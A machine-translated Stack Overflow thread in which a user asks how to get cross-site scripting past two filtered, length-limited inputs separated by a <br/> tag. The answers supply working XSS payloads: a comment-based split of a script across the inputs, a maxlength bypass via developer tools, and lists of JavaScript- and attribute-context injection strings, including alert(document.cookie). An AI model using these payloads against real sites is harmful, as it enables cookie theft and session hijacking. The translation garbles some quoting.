如何執行跨站腳本攻擊這些限制:XSS與<script>隨後<br/>
[input 1] <br/> [input 2]輸入1具有以下限制: - 只有10個字符 - Unsanitized
輸入2具有以下限制: - 「<」,「>」,「&」已過濾 - 沒有其他限制
此外,網頁允許持久性輸入,但一旦我打開標籤,我無法執行額外的輸入。
我試圖做:
<script> <br/> alert(document.cookie)但它似乎並沒有在那裏工作大概是因爲BR標籤。 關於我應該如何繼續的想法?
例如:<script>/* <br/> */ alert(1); /*
這不提供問題的答案。要批評或要求作者澄清,請在其帖子下方留言。 - [來自評論](/ review/low-quality-posts/13730370) – Liam
@Liam這確實提供了一個問題的答案。 –
有人將此標記爲不是答案(不是我)。它被髮送到我(和其他人)[審查它]的評論隊列(http://stackoverflow.com/review/low-quality-posts/13730370)。對我而言,這個答案沒有很好的解釋,並且像評論一樣。如果你添加更多的細節,你可以避免它被刪除。我的投票現在通過,我無法撤消它,但需要幾個選票才能刪除答案。所以,如果你充分糾正它,你可以避免刪除。只是重新迭代,我不能再改變這個過程 – Liam
你說:
輸入1具有以下限制: - 只有10個字符 - Unsanitized
如果輸入的值只是體現在頁面(沒有控制服務器端的最大長度),您可以使用瀏覽器的開發人員工具來增加輸入的最大長度值,然後輸入你想要的有效載荷。
然後你說:
輸入2具有以下限制: - 「<」, 「>」, 「&」 的消毒 - 沒有任何其他限制
現在這取決於其中該輸入值反映如下:
如果輸入參數值反映在Javascript中,則可以嘗試:
";alert('XSS');//
");alert(document.cookie);
; window.open(www.google.com);
';alert(String.fromCharCode(88,83,83))//
如果輸入參數值是反映在HTML輸入標記或其他HTML代碼,你可以嘗試:
1? onmouseover=alert("xss"); "
"onload='confirm("test XSS")’
" onload=window.open(www.google.com)
" onload='javascript:alert(1)’
XSS取決於在那裏被反射!你也必須使用你的大腦。
我想知道爲什麼人們低估了這一點。這是一個可以回答的編程問題。 –